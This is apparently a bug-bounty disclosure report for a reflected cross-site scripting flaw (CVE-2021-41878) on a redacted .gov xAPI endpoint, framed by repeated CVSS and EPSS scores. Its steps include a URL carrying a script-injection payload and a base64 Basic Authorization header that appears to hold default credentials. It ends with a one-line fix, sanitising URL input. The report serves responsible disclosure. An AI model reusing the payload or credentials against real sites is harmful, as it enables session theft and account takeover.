6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.005 Low
EPSS
Percentile
72.2%
Hi team,
I was able to execute XSS on ███████.gov
Steps to produce -
1 -Turn on the burp intercepter
2- Go to https://██████.gov/xapi/statements?file"><script>alert(document.domain)</script>
3- In Intercepter add the following Headers
Authorization: Basic eGFwaS10b29sczp4YXBpLXRvb2xz
X-Experience-Api-Version: 1.0.1
4- when you send this GET request you will receive a response with XSS payload executed.
An attacker can send the malicious link to victims and steals victims’ cookie leading to account takeover.
CVE-2021-41878
I have attached the Video POC, please check it out.
sanitize the inputs in the URL
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.005 Low
EPSS
Percentile
72.2%